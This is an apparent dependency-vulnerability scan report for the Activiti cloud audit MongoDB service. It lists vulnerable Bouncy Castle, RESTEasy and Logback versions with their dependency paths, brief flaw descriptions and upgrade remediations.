Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
Overview
org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.
Affected versions of this package are vulnerable to Information Exposure. Attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key performing the encryption.
Remediation
Upgrade org.bouncycastle:bcprov-jdk15on to version 1.61 or higher.
References
high severity
- Vulnerable module: org.bouncycastle:bcprov-jdk15on
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
Overview
BouncyCastle is a Java implementation of cryptographic algorithms.
Affected versions of this package are vulnerable to Insecure Encryption. It has a flaw in the Low-level interface to RSA key pair generator, specifically RSA Key Pairs generated in low-level API with added certainty may have less M-R tests than expected.
Remediation
Upgrade org.bouncycastle:bcprov-jdk15on to version 1.60 or higher.
References
high severity
- Vulnerable module: org.jboss.resteasy:resteasy-jaxrs
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › org.jboss.resteasy:resteasy-jaxrs@3.0.21.Final
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › org.jboss.resteasy:resteasy-jaxrs@3.0.21.Final
Overview
org.jboss.resteasy:resteasy-jaxrs is a JCP specification that provides a Java API for RESTful Web Services over the HTTP protocol.
Affected versions of this package are vulnerable to HTTP Request Smuggling. It was discovered that the CORS Filter did not add an HTTP Vary header indicating that the response varies depending on Origin. This permitted client and server side cache poisoning in some circumstances.
Remediation
Upgrade org.jboss.resteasy:resteasy-jaxrs to version 3.5.0.CR1, 3.0.25.Final or higher.
References
high severity
- Vulnerable module: org.jboss.resteasy:resteasy-jaxrs
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › org.jboss.resteasy:resteasy-jaxrs@3.0.21.Final
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › org.jboss.resteasy:resteasy-jaxrs@3.0.21.Final
Overview
org.jboss.resteasy:resteasy-jaxrs is a JCP specification that provides a Java API for RESTful Web Services over the HTTP protocol.
Affected versions of this package are vulnerable to Improper Input Validation in MediaTypeHeaderDelegate.java class results in the class returning an illegal header that will be then integrated in the server's response.
Remediation
Upgrade org.jboss.resteasy:resteasy-jaxrs to version 3.11.0.Final or higher.
References
high severity
- Vulnerable module: ch.qos.logback:logback-core
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-logging@7-201802-EA › net.logstash.logback:logstash-logback-encoder@4.11 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.boot:spring-boot-starter-aop@4.0.0-M2 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
